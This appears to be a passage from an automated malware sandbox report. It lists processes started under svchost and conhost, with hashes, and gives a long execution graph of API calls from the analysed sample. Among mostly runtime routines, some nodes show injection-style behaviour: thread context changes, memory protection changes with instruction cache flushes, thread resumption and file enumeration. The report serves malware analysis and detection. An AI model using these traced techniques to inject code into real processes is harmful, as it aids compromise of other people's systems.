                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:653
                            Start time:03:43:37
                            Start date:04/10/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:671
                            Start time:03:43:45
                            Start date:04/10/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Reset < >

                              Execution Graph

                              Execution Coverage:1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:12.6%
                              Total number of Nodes:1749
                              Total number of Limit Nodes:2
                              execution_graph 15042 2241390bd34 15043 2241390bd4d 15042->15043 15056 2241390bd49 15042->15056 15057 2241390e864 15043->15057 15048 2241390bd6b 15089 2241390bda8 15048->15089 15049 2241390bd5f 15083 2241390d2a0 15049->15083 15053 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15054 2241390bd92 15053->15054 15055 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15054->15055 15055->15056 15058 2241390bd52 15057->15058 15059 2241390e871 15057->15059 15063 2241390edc8 GetEnvironmentStringsW 15058->15063 15108 2241390cacc 15059->15108 15061 2241390e8a0 15113 2241390e53c 15061->15113 15064 2241390edf8 15063->15064 15065 2241390bd57 15063->15065 15066 2241390ece8 WideCharToMultiByte 15064->15066 15065->15048 15065->15049 15067 2241390ee49 15066->15067 15068 2241390ee53 FreeEnvironmentStringsW 15067->15068 15069 2241390c5d0 14 API calls 15067->15069 15068->15065 15070 2241390ee63 15069->15070 15071 2241390ee74 15070->15071 15072 2241390ee6b 15070->15072 15074 2241390ece8 WideCharToMultiByte 15071->15074 15073 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15072->15073 15075 2241390ee72 15073->15075 15076 2241390ee97 15074->15076 15075->15068 15077 2241390eea5 15076->15077 15078 2241390ee9b 15076->15078 15079 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15077->15079 15080 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15078->15080 15081 2241390eea3 FreeEnvironmentStringsW 15079->15081 15080->15081 15081->15065 15084 2241390d2a5 HeapFree 15083->15084 15085 2241390d2d6 15083->15085 15084->15085 15086 2241390d2c0 GetLastError 15084->15086 15085->15056 15087 2241390d2cd Concurrency::details::SchedulerProxy::DeleteThis 15086->15087 15088 2241390d1f4 __std_exception_copy 11 API calls 15087->15088 15088->15085 15090 2241390bdcd 15089->15090 15091 2241390d220 __std_exception_copy 13 API calls 15090->15091 15101 2241390be03 15091->15101 15092 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15094 2241390bd73 15092->15094 15093 2241390be6d 15095 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15093->15095 15094->15053 15095->15094 15096 2241390d220 __std_exception_copy 13 API calls 15096->15101 15097 2241390be92 15413 2241390bebc 15097->15413 15101->15093 15101->15096 15101->15097 15103 2241390bea6 15101->15103 15104 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15101->15104 15105 2241390be0b 15101->15105 15404 2241390c328 15101->15404 15102 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15102->15105 15419 2241390d06c IsProcessorFeaturePresent 15103->15419 15104->15101 15105->15092 15109 2241390cae4 15108->15109 15110 2241390cae8 FlsGetValue 15108->15110 15112 2241390cafe 15109->15112 15136 2241390c940 GetLastError 15109->15136 15110->15109 15112->15061 15201 2241390e7ac 15113->15201 15120 2241390e5a7 15121 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15120->15121 15134 2241390e58e 15121->15134 15122 2241390e5b6 15122->15122 15227 2241390e8e0 15122->15227 15125 2241390e6b2 15126 2241390d1f4 __std_exception_copy 13 API calls 15125->15126 15127 2241390e6b7 15126->15127 15129 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15127->15129 15128 2241390e70d 15135 2241390e774 15128->15135 15238 2241390e05c 15128->15238 15129->15134 15130 2241390e6cc 15130->15128 15133 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15130->15133 15132 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15132->15134 15133->15128 15134->15058 15135->15132 15137 2241390c966 15136->15137 15138 2241390c96c SetLastError 15137->15138 15154 2241390d220 15137->15154 15139 2241390c9e5 15138->15139 15139->15112 15142 2241390c9a5 FlsSetValue 15145 2241390c9c8 15142->15145 15146 2241390c9b1 FlsSetValue 15142->15146 15143 2241390c995 FlsSetValue 15144 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 15143->15144 15147 2241390c9a3 15144->15147 15161 2241390c758 15145->15161 15148 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 15146->15148 15147->15138 15151 2241390c9c6 SetLastError 15148->15151 15151->15139 15160 2241390d231 __std_exception_copy 15154->15160 15155 2241390d282 15169 2241390d1f4 15155->15169 15156 2241390d266 HeapAlloc 15158 2241390c987 15156->15158 15156->15160 15158->15142 15158->15143 15160->15155 15160->15156 15166 2241390b470 15160->15166 15187 2241390c630 15161->15187 15172 2241390b4c0 15166->15172 15178 2241390cb10 15169->15178 15177 2241390c558 EnterCriticalSection 15172->15177 15179 2241390cb59 GetLastError 15178->15179 15183 2241390cb2f __std_exception_copy 15178->15183 15180 2241390cb6c 15179->15180 15181 2241390cb8a SetLastError 15180->15181 15184 2241390cb87 15180->15184 15186 2241390c940 __std_exception_copy 11 API calls 15180->15186 15182 2241390cb54 15181->15182 15182->15158 15183->15182 15185 2241390c940 __std_exception_copy 11 API calls 15183->15185 15184->15181 15185->15182 15186->15184 15199 2241390c558 EnterCriticalSection 15187->15199 15202 2241390e7cf 15201->15202 15209 2241390e7d9 15202->15209 15253 2241390c558 EnterCriticalSection 15202->15253 15208 2241390e571 15213 2241390e22c 15208->15213 15209->15208 15210 2241390cacc 14 API calls 15209->15210 15211 2241390e8a0 15210->15211 15212 2241390e53c 56 API calls 15211->15212 15212->15208 15254 2241390dd78 15213->15254 15216 2241390e24c GetOEMCP 15218 2241390e273 15216->15218 15217 2241390e25e 15217->15218 15219 2241390e263 GetACP 15217->15219 15218->15134 15220 2241390c5d0 15218->15220 15219->15218 15221 2241390c61b 15220->15221 15225 2241390c5df __std_exception_copy 15220->15225 15223 2241390d1f4 __std_exception_copy 13 API calls 15221->15223 15222 2241390c602 HeapAlloc 15224 2241390c619 15222->15224 15222->15225 15223->15224 15224->15120 15224->15122 15225->15221 15225->15222 15226 2241390b470 __std_exception_copy 2 API calls 15225->15226 15226->15225 15228 2241390e22c 16 API calls 15227->15228 15229 2241390e91b 15228->15229 15230 2241390e958 IsValidCodePage 15229->15230 15236 2241390ea71 15229->15236 15237 2241390e972 15229->15237 15233 2241390e969 15230->15233 15230->15236 15234 2241390e998 GetCPInfo 15233->15234 15233->15237 15234->15236 15234->15237 15302 22413908070 15236->15302 15291 2241390e344 15237->15291 15403 2241390c558 EnterCriticalSection 15238->15403 15255 2241390dd9c 15254->15255 15256 2241390dd97 15254->15256 15255->15256 15262 2241390cab0 15255->15262 15256->15216 15256->15217 15258 2241390ddb7 15270 2241390ffb4 15258->15270 15263 2241390cb10 __std_exception_copy 13 API calls 15262->15263 15264 2241390cab9 15263->15264 15265 2241390cabe 15264->15265 15266 2241390cae8 FlsGetValue 15264->15266 15268 2241390cae4 15264->15268 15265->15258 15266->15268 15267 2241390cafe 15267->15258 15268->15267 15269 2241390c940 __std_exception_copy 13 API calls 15268->15269 15269->15267 15271 2241390ffc9 15270->15271 15272 2241390ddda 15270->15272 15271->15272 15278 22413910a40 15271->15278 15274 22413910020 15272->15274 15275 22413910035 15274->15275 15276 22413910048 15274->15276 15275->15276 15288 2241390e8c4 15275->15288 15276->15256 15279 2241390cab0 _invalid_parameter_noinfo 14 API calls 15278->15279 15280 22413910a4f 15279->15280 15286 22413910a95 15280->15286 15287 2241390c558 EnterCriticalSection 15280->15287 15286->15272 15289 2241390cab0 _invalid_parameter_noinfo 14 API calls 15288->15289 15290 2241390e8cd 15289->15290 15292 2241390e38f GetCPInfo 15291->15292 15301 2241390e485 15291->15301 15293 2241390e3a2 15292->15293 15292->15301 15311 22413911474 15293->15311 15294 22413908070 _invalid_parameter_noinfo 8 API calls 15296 2241390e524 15294->15296 15296->15236 15301->15294 15303 22413908079 15302->15303 15304 22413908084 15303->15304 15305 22413908848 IsProcessorFeaturePresent 15303->15305 15304->15125 15304->15130 15306 22413908860 15305->15306 15398 2241390891c RtlCaptureContext 15306->15398 15312 2241390dd78 14 API calls 15311->15312 15313 224139114b6 15312->15313 15331 2241390ec58 15313->15331 15333 2241390ec61 MultiByteToWideChar 15331->15333 15399 22413908936 RtlLookupFunctionEntry 15398->15399 15400 22413908873 15399->15400 15401 2241390894c RtlVirtualUnwind 15399->15401 15402 22413908814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15400->15402 15401->15399 15401->15400 15405 2241390c335 15404->15405 15407 2241390c33f 15404->15407 15405->15407 15411 2241390c35a 15405->15411 15406 2241390d1f4 __std_exception_copy 13 API calls 15408 2241390c346 15406->15408 15407->15406 15423 2241390d04c 15408->15423 15410 2241390c352 15410->15101 15411->15410 15412 2241390d1f4 __std_exception_copy 13 API calls 15411->15412 15412->15408 15414 2241390bec1 15413->15414 15418 2241390be9a 15413->15418 15415 2241390beea 15414->15415 15417 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15414->15417 15416 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15415->15416 15416->15418 15417->15414 15418->15102 15420 2241390d07f 15419->15420 15479 2241390cd80 15420->15479 15426 2241390cef8 15423->15426 15427 2241390cf23 15426->15427 15434 2241390cf94 15427->15434 15429 2241390cf4a 15430 2241390cf6d 15429->15430 15444 2241390c3e0 15429->15444 15432 2241390cf82 15430->15432 15433 2241390c3e0 _invalid_parameter_noinfo 17 API calls 15430->15433 15432->15410 15433->15432 15457 2241390ccc8 15434->15457 15439 2241390cfcf 15439->15429 15440 2241390d06c _invalid_parameter_noinfo 17 API calls 15441 2241390d04a 15440->15441 15442 2241390cef8 _invalid_parameter_noinfo 38 API calls 15441->15442 15443 2241390d065 15442->15443 15443->15429 15445 2241390c438 15444->15445 15446 2241390c3ef GetLastError 15444->15446 15445->15430 15447 2241390c404 15446->15447 15448 2241390cba0 _invalid_parameter_noinfo 14 API calls 15447->15448 15449 2241390c41e SetLastError 15448->15449 15449->15445 15450 2241390c441 15449->15450 15451 2241390c3e0 _invalid_parameter_noinfo 15 API calls 15450->15451 15452 2241390c467 15451->15452 15471 2241390ffe8 15452->15471 15458 2241390cce4 GetLastError 15457->15458 15459 2241390cd1f 15457->15459 15460 2241390ccf4 15458->15460 15459->15439 15463 2241390cd34 15459->15463 15466 2241390cba0 15460->15466 15464 2241390cd68 15463->15464 15465 2241390cd50 GetLastError SetLastError 15463->15465 15464->15439 15464->15440 15465->15464 15467 2241390cbc8 FlsGetValue 15466->15467 15469 2241390cbc4 15466->15469 15467->15469 15468 2241390cbde SetLastError 15468->15459 15469->15468 15470 2241390c940 __std_exception_copy 13 API calls 15469->15470 15470->15468 15472 22413910001 15471->15472 15474 2241390c48f 15471->15474 15473 22413910a40 _invalid_parameter_noinfo 14 API calls 15472->15473 15472->15474 15473->15474 15475 22413910054 15474->15475 15476 2241391006d 15475->15476 15477 2241390c49f 15475->15477 15476->15477 15478 2241390e8c4 _invalid_parameter_noinfo 14 API calls 15476->15478 15477->15430 15478->15477 15480 2241390cdba _invalid_parameter_noinfo 15479->15480 15481 2241390cde2 RtlCaptureContext RtlLookupFunctionEntry 15480->15481 15482 2241390ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15481->15482 15483 2241390ce2e RtlVirtualUnwind 15481->15483 15484 2241390ceb6 _invalid_parameter_noinfo 15482->15484 15483->15482 15485 22413908070 _invalid_parameter_noinfo 8 API calls 15484->15485 15486 2241390ced5 GetCurrentProcess TerminateProcess 15485->15486 15015 22413901e3c LoadLibraryA GetProcAddress 15016 22413901e6f 15015->15016 15017 22413901e62 SleepEx 15015->15017 15017->15017 17811 22413931e3c LoadLibraryA GetProcAddress 17812 22413931e6f 17811->17812 17813 22413931e62 Sleep 17811->17813 17813->17813 16440 2241390f440 GetProcessHeap 17152 2241390ff40 17153 2241390ff4b 17152->17153 17161 22413912c24 17153->17161 17174 2241390c558 EnterCriticalSection 17161->17174 17827 2241390ae42 17828 22413909324 _CreateFrameInfo 9 API calls 17827->17828 17830 2241390ae4f __CxxCallCatchBlock 17828->17830 17829 2241390ae93 RaiseException 17831 2241390aeba 17829->17831 17830->17829 17832 22413909978 __CxxCallCatchBlock 9 API calls 17831->17832 17837 2241390aec2 17832->17837 17833 2241390aeeb __CxxCallCatchBlock 17834 22413909324 _CreateFrameInfo 9 API calls 17833->17834 17835 2241390aefe 17834->17835 17836 22413909324 _CreateFrameInfo 9 API calls 17835->17836 17838 2241390af07 17836->17838 17837->17833 17839 22413908ff8 __CxxCallCatchBlock 9 API calls 17837->17839 17839->17833 16489 2241390c828 16490 2241390c842 16489->16490 16491 2241390c82d 16489->16491 16495 2241390c848 16491->16495 16496 2241390c892 16495->16496 16497 2241390c88a 16495->16497 16499 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16496->16499 16498 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16497->16498 16498->16496 16500 2241390c89f 16499->16500 16501 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16500->16501 16502 2241390c8ac 16501->16502 16503 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16502->16503 16504 2241390c8b9 16503->16504 16505 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16504->16505 16506 2241390c8c6 16505->16506 16507 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16506->16507 16508 2241390c8d3 16507->16508 16509 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16508->16509 16510 2241390c8e0 16509->16510 16511 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16510->16511 16512 2241390c8ed 16511->16512 16513 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16512->16513 16514 2241390c8fd 16513->16514 16515 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16514->16515 16516 2241390c90d 16515->16516 16521 2241390c6f8 16516->16521 16535 2241390c558 EnterCriticalSection 16521->16535 16538 22413906430 16539 2241390643d 16538->16539 16540 22413906449 16539->16540 16546 2241390655a 16539->16546 16541 224139064a6 SetThreadContext 16540->16541 16542 224139064cd 16540->16542 16541->16542 16543 2241390663e 16545 2241390665e 16543->16545 16554 22413904b20 16543->16554 16544 22413906581 VirtualProtect FlushInstructionCache 16544->16546 16558 22413905530 GetCurrentProcess 16545->16558 16546->16543 16546->16544 16549 224139066b7 16552 22413908070 _invalid_parameter_noinfo 8 API calls 16549->16552 16550 22413906677 ResumeThread 16551 22413906663 16550->16551 16551->16549 16551->16550 16553 224139066ff 16552->16553 16557 22413904b3c 16554->16557 16555 22413904b9f 16555->16545 16556 22413904b52 VirtualFree 16556->16557 16557->16555 16557->16556 16561 2241390554c 16558->16561 16559 22413905562 VirtualProtect FlushInstructionCache 16559->16561 16560 22413905593 16560->16551 16561->16559 16561->16560 16562 2241390ec30 GetCommandLineA GetCommandLineW 17840 22413902e54 17842 22413902ea8 17840->17842 17841 22413902ec3 17842->17841 17844 224139037f4 17842->17844 17845 2241390388a 17844->17845 17848 22413903819 17844->17848 17845->17841 17846 22413903f88 StrCmpNIW 17846->17848 17847 22413901e08 StrCmpIW StrCmpW 17847->17848 17848->17845 17848->17846 17848->17847 17849 2241393d658 17850 2241393d67d 17849->17850 17855 2241393d694 17849->17855 17851 2241393d1f4 __std_exception_copy 13 API calls 17850->17851 17852 2241393d682 17851->17852 17854 2241393d04c _invalid_parameter_noinfo 38 API calls 17852->17854 17853 2241393d724 17981 2241393bb54 17853->17981 17871 2241393d68d 17854->17871 17855->17853 17873 2241393d7b6 17855->17873 17875 2241393d6da 17855->17875 17882 2241393d894 17855->17882 17944 2241393da18 17855->17944 17860 2241393d784 17862 2241393d2a0 __free_lconv_num 13 API calls 17860->17862 17861 2241393d836 17863 2241393d2a0 __free_lconv_num 13 API calls 17861->17863 17870 2241393d78b 17862->17870 17876 2241393d841 17863->17876 17864 2241393d2a0 __free_lconv_num 13 API calls 17864->17870 17865 2241393d2a0 __free_lconv_num 13 API calls 17865->17871 17866 2241393d85a 17874 2241393d2a0 __free_lconv_num 13 API calls 17866->17874 17867 2241393d2a0 __free_lconv_num 13 API calls 17867->17873 17868 2241393d2a0 __free_lconv_num 13 API calls 17868->17875 17870->17864 17877 2241393d6fd 17870->17877 17872 2241393d2a0 __free_lconv_num 13 API calls 17872->17876 17873->17867 17873->17877 17874->17871 17875->17868 17875->17877 17876->17866 17876->17872 17877->17865 17878 2241393d87c 17880 2241393d06c _invalid_parameter_noinfo 17 API calls 17878->17880 17879 2241393d7d7 17879->17861 17879->17878 17987 22413940eb8 17879->17987 17881 2241393d891 17880->17881 17883 2241393d8c2 17882->17883 17883->17883 17884 2241393d8de 17883->17884 17885 2241393d220 __std_exception_copy 13 API calls 17883->17885 17884->17855 17886 2241393d90d 17885->17886 17887 2241393d926 17886->17887 17888 22413940eb8 38 API calls 17886->17888 17889 22413940eb8 38 API calls 17887->17889 17891 2241393d9fc 17887->17891 17888->17887 17890 2241393d943 17889->17890 17890->17891 17893 2241393d97f 17890->17893 17894 2241393d962 17890->17894 17895 2241393d98d 17890->17895 17892 2241393d06c _invalid_parameter_noinfo 17 API calls 17891->17892 17905 2241393da17 17892->17905 17897 2241393d2a0 __free_lconv_num 13 API calls 17893->17897 17896 2241393d220 __std_exception_copy 13 API calls 17894->17896 17898 2241393d977 17895->17898 17996 2241393eee0 17895->17996 17899 2241393d96d 17896->17899 17897->17891 17898->17893 17902 2241393d2a0 __free_lconv_num 13 API calls 17898->17902 17903 2241393d2a0 __free_lconv_num 13 API calls 17899->17903 17901 2241393da7a 17906 2241393da8c 17901->17906 17913 2241393daa1 17901->17913 17902->17893 17903->17898 17904 2241393d9b5 17907 2241393d9ba 17904->17907 17908 2241393d9d0 17904->17908 17905->17901 18005 224139413d8 17905->18005 17911 2241393d894 52 API calls 17906->17911 17912 2241393d2a0 __free_lconv_num 13 API calls 17907->17912 17910 2241393d2a0 __free_lconv_num 13 API calls 17908->17910 17910->17893 17936 2241393da9c 17911->17936 17912->17898 17915 2241393dd78 14 API calls 17913->17915 17914 22413938070 _invalid_parameter_noinfo 8 API calls 17916 2241393dd64 17914->17916 17917 2241393db0b 17915->17917 17916->17855 17918 2241393db1a 17917->17918 18014 2241393f198 17917->18014 18018 2241393d30c 17918->18018 17922 2241393dba8 17923 2241393d894 52 API calls 17922->17923 17924 2241393dbb8 17923->17924 17926 2241393d2a0 __free_lconv_num 13 API calls 17924->17926 17924->17936 17925 2241393dd78 14 API calls 17928 2241393dbd2 17925->17928 17926->17936 17927 2241393f198 9 API calls 17927->17928 17928->17925 17928->17927 17930 2241393d894 52 API calls 17928->17930 17931 2241393dcc8 FindNextFileW 17928->17931 17932 2241393dd2a 17928->17932 17940 2241393d2a0 13 API calls __free_lconv_num 17928->17940 18040 2241393d4ac 17928->18040 17930->17928 17931->17928 17934 2241393dce0 17931->17934 17933 2241393dd38 FindClose 17932->17933 17938 2241393d2a0 __free_lconv_num 13 API calls 17932->17938 17933->17936 17939 2241393dd48 17933->17939 17935 2241393dd0c FindClose 17934->17935 18062 22413940b20 17934->18062 17935->17936 17937 2241393dd1c 17935->17937 17936->17914 17942 2241393d2a0 __free_lconv_num 13 API calls 17937->17942 17938->17933 17943 2241393d2a0 __free_lconv_num 13 API calls 17939->17943 17940->17928 17942->17936 17943->17936 17945 2241393da58 17944->17945 17946 2241393da7a 17944->17946 17945->17946 17948 224139413d8 38 API calls 17945->17948 17947 2241393da8c 17946->17947 17950 2241393daa1 17946->17950 17949 2241393d894 56 API calls 17947->17949 17948->17945 17963 2241393da9c 17949->17963 17952 2241393dd78 14 API calls 17950->17952 17951 22413938070 _invalid_parameter_noinfo 8 API calls 17953 2241393dd64 17951->17953 17954 2241393db0b 17952->17954 17953->17855 17955 2241393db1a 17954->17955 17956 2241393f198 9 API calls 17954->17956 17957 2241393d30c 16 API calls 17955->17957 17956->17955 17958 2241393db7b FindFirstFileExW 17957->17958 17959 2241393dba8 17958->17959 17969 2241393dbd2 17958->17969 17960 2241393d894 56 API calls 17959->17960 17961 2241393dbb8 17960->17961 17961->17963 17964 2241393d2a0 __free_lconv_num 13 API calls 17961->17964 17962 2241393dd78 14 API calls 17962->17969 17963->17951 17964->17963 17965 2241393f198 9 API calls 17965->17969 17966 2241393d4ac 16 API calls 17966->17969 17967 2241393d894 56 API calls 17967->17969 17968 2241393dcc8 FindNextFileW 17968->17969 17972 2241393dce0 17968->17972 17969->17962 17969->17965 17969->17966 17969->17967 17969->17968 17970 2241393d2a0 13 API calls __free_lconv_num 17969->17970 17971 2241393dd2a 17969->17971 17970->17969 17973 2241393dd38 FindClose 17971->17973 17976 2241393d2a0 __free_lconv_num 13 API calls 17971->17976 17974 2241393dd0c FindClose 17972->17974 17978 22413940b20 38 API calls 17972->17978 17973->17963 17977 2241393dd48 17973->17977 17974->17963 17975 2241393dd1c 17974->17975 17979 2241393d2a0 __free_lconv_num 13 API calls 17975->17979 17976->17973 17980 2241393d2a0 __free_lconv_num 13 API calls 17977->17980 17978->17974 17979->17963 17980->17963 17982 2241393bba4 17981->17982 17983 2241393bb6c 17981->17983 17982->17860 17982->17879 17983->17982 17984 2241393d220 __std_exception_copy 13 API calls 17983->17984 17985 2241393bb9a 17984->17985 17986 2241393d2a0 __free_lconv_num 13 API calls 17985->17986 17986->17982 17992 22413940ed5 17987->17992 17988 22413940eda 17989 22413940ef0 17988->17989 17990 2241393d1f4 __std_exception_copy 13 API calls 17988->17990 17989->17879 17991 22413940ee4 17990->17991 17993 2241393d04c _invalid_parameter_noinfo 38 API calls 17991->17993 17992->17988 17992->17989 17994 22413940f24 17992->17994 17993->17989 17994->17989 17995 2241393d1f4 __std_exception_copy 13 API calls 17994->17995 17995->17991 17997 2241393ef02 17996->17997 17998 2241393ef1f 17996->17998 17997->17998 17999 2241393ef10 17997->17999 18000 2241393ef29 17998->18000 18070 224139419f0 17998->18070 18001 2241393d1f4 __std_exception_copy 13 API calls 17999->18001 18077 22413941a40 18000->18077 18004 2241393ef15 18001->18004 18004->17904 18006 224139413e0 18005->18006 18007 224139413f5 18006->18007 18008 2241394140e 18006->18008 18009 2241393d1f4 __std_exception_copy 13 API calls 18007->18009 18010 22413941405 18008->18010 18012 2241393dd78 14 API calls 18008->18012 18011 224139413fa 18009->18011 18010->17905 18013 2241393d04c _invalid_parameter_noinfo 38 API calls 18011->18013 18012->18010 18013->18010 18015 2241393f1ca 18014->18015 18016 2241393f1a9 18014->18016 18015->17918 18016->18015 18017 2241393ef88 9 API calls 18016->18017 18017->18015 18019 2241393d35a 18018->18019 18020 2241393d336 18018->18020 18021 2241393d3bf 18019->18021 18022 2241393d35f 18019->18022 18023 2241393d2a0 __free_lconv_num 13 API calls 18020->18023 18035 2241393d345 FindFirstFileExW 18020->18035 18024 2241393ec58 MultiByteToWideChar 18021->18024 18025 2241393d374 18022->18025 18027 2241393d2a0 __free_lconv_num 13 API calls 18022->18027 18022->18035 18023->18035 18033 2241393d3db 18024->18033 18028 2241393c5d0 14 API calls 18025->18028 18026 2241393d3e2 GetLastError 18089 2241393d184 18026->18089 18027->18025 18028->18035 18030 2241393d420 18031 2241393ec58 MultiByteToWideChar 18030->18031 18030->18035 18036 2241393d47a 18031->18036 18033->18026 18033->18030 18034 2241393d413 18033->18034 18038 2241393d2a0 __free_lconv_num 13 API calls 18033->18038 18039 2241393c5d0 14 API calls 18034->18039 18035->17922 18035->17928 18036->18026 18036->18035 18037 2241393d1f4 __std_exception_copy 13 API calls 18037->18035 18038->18034 18039->18030 18041 2241393d4fa 18040->18041 18042 2241393d4d6 18040->18042 18043 2241393d500 18041->18043 18044 2241393d55f 18041->18044 18045 2241393d2a0 __free_lconv_num 13 API calls 18042->18045 18050 2241393d4e5 18042->18050 18047 2241393d515 18043->18047 18043->18050 18051 2241393d2a0 __free_lconv_num 13 API calls 18043->18051 18046 2241393ece8 WideCharToMultiByte 18044->18046 18045->18050 18054 2241393d583 18046->18054 18048 2241393c5d0 14 API calls 18047->18048 18048->18050 18049 2241393d58a GetLastError 18052 2241393d184 13 API calls 18049->18052 18050->17928 18051->18047 18057 2241393d597 18052->18057 18053 2241393d5c7 18053->18050 18056 2241393ece8 WideCharToMultiByte 18053->18056 18054->18049 18054->18053 18055 2241393d5bb 18054->18055 18058 2241393d2a0 __free_lconv_num 13 API calls 18054->18058 18059 2241393c5d0 14 API calls 18055->18059 18060 2241393d629 18056->18060 18061 2241393d1f4 __std_exception_copy 13 API calls 18057->18061 18058->18055 18059->18053 18060->18049 18060->18050 18061->18050 18063 22413940b52 18062->18063 18064 2241393d1f4 __std_exception_copy 13 API calls 18063->18064 18069 22413940b67 18063->18069 18065 22413940b5c 18064->18065 18066 2241393d04c _invalid_parameter_noinfo 38 API calls 18065->18066 18066->18069 18067 22413938070 _invalid_parameter_noinfo 8 API calls 18068 22413940ea8 18067->18068 18068->17935 18069->18067 18071 224139419f9 18070->18071 18072 22413941a12 HeapSize 18070->18072 18073 2241393d1f4 __std_exception_copy 13 API calls 18071->18073 18074 224139419fe 18073->18074 18075 2241393d04c _invalid_parameter_noinfo 38 API calls 18074->18075 18076 22413941a09 18075->18076 18076->18000 18078 22413941a55 18077->18078 18079 22413941a5f 18077->18079 18080 2241393c5d0 14 API calls 18078->18080 18081 22413941a64 18079->18081 18087 22413941a6b __std_exception_copy 18079->18087 18086 22413941a5d 18080->18086 18084 2241393d2a0 __free_lconv_num 13 API calls 18081->18084 18082 22413941a71 18085 2241393d1f4 __std_exception_copy 13 API calls 18082->18085 18083 22413941a9e HeapReAlloc 18083->18086 18083->18087 18084->18086 18085->18086 18086->18004 18087->18082 18087->18083 18088 2241393b470 __std_exception_copy 2 API calls 18087->18088 18088->18087 18094 2241393d1d0 18089->18094 18091 2241393d191 __free_lconv_num 18092 2241393d1f4 __std_exception_copy 13 API calls 18091->18092 18093 2241393d1a1 18092->18093 18093->18037 18095 2241393cb10 __std_exception_copy 13 API calls 18094->18095 18096 2241393d1d9 18095->18096 18096->18091 18106 2241390d658 18107 2241390d67d 18106->18107 18111 2241390d694 18106->18111 18108 2241390d1f4 __std_exception_copy 13 API calls 18107->18108 18109 2241390d682 18108->18109 18112 2241390d04c _invalid_parameter_noinfo 38 API calls 18109->18112 18110 2241390d724 18238 2241390bb54 18110->18238 18111->18110 18121 2241390d6da 18111->18121 18123 2241390d7b6 18111->18123 18139 2241390d894 18111->18139 18201 2241390da18 18111->18201 18114 2241390d68d 18112->18114 18117 2241390d784 18120 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18117->18120 18119 2241390d836 18124 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18119->18124 18122 2241390d78b 18120->18122 18126 2241390d6fd 18121->18126 18130 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18121->18130 18122->18126 18131 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18122->18131 18123->18126 18129 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18123->18129 18125 2241390d841 18124->18125 18128 2241390d85a 18125->18128 18133 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18125->18133 18132 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18126->18132 18127 2241390d7d7 18127->18119 18127->18127 18136 2241390d87c 18127->18136 18244 22413910eb8 18127->18244 18134 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18128->18134 18129->18123 18130->18121 18131->18122 18132->18114 18133->18125 18134->18114 18137 2241390d06c _invalid_parameter_noinfo 17 API calls 18136->18137 18138 2241390d891 18137->18138 18140 2241390d8c2 18139->18140 18140->18140 18141 2241390d8de 18140->18141 18142 2241390d220 __std_exception_copy 13 API calls 18140->18142 18141->18111 18143 2241390d90d 18142->18143 18144 2241390d926 18143->18144 18146 22413910eb8 38 API calls 18143->18146 18145 22413910eb8 38 API calls 18144->18145 18148 2241390d9fc 18144->18148 18147 2241390d943 18145->18147 18146->18144 18147->18148 18149 2241390d97f 18147->18149 18151 2241390d98d 18147->18151 18152 2241390d962 